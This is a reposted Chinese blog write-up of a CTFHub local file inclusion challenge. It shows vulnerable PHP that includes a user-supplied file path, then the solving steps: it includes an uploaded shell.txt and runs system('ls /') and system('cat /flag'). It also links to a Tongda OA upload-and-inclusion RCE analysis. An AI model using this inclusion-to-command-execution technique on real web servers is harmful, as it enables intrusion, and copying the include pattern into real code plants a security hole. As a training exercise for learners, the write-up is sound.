ctfhub文件包含:本地文件包含

其他 2021-02-09 08:59:32 阅读次数: 0

代码

<?php
// 关闭错误报告
error_reporting(0);
if (isset($_GET['file'])) {
    
    
//strpos — 查找字符串首次出现的位置
    if (!strpos($_GET["file"], "flag")) {
    
    
        include $_GET["file"];
    } else {
    
    
        echo "Hacker!!!";
    }
} else {
    
    
    highlight_file(__FILE__);
}
?>

strpos — 查找字符串首次出现的位置
返回值为true或者false,匹配到是true
使用 === 运算符来测试此函数的返回值。

过程

本地文件包含
hackbar工具
?file=shell.txt
ctfhub=system(“pwd”);
ctfhub=system(“ls /”);
ctfhub=system(“cat /flag”);

拓展
通达OA 任意文件上传+文件包含导致RCE
https://www.cnblogs.com/yuzly/p/13607055.html

猜你喜欢

转载自blog.csdn.net/luminous_you/article/details/110912182
今日推荐
周排行
成为C++高手之宏与枚举
在CAD二次开发中使用进度条
Js插件ECharts,HighCharts学习网址整理
Celery提交任务出错(on windows.)
cephfs内核客户端性能追踪
thinkphp中PHPExcel用法
EntityFramework动态组合多排序字段
汇编语言(八)实验9 根据材料编程
安装ubuntu后必须做的事情(对我而言)
JS函数式编程
每日归档
更多
2024-10-22(0)
2024-10-21(0)
2024-10-20(0)
2024-10-19(0)
2024-10-18(0)
2024-10-17(0)
2024-10-16(0)
2024-10-15(0)
2024-10-14(0)
2024-10-13(0)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022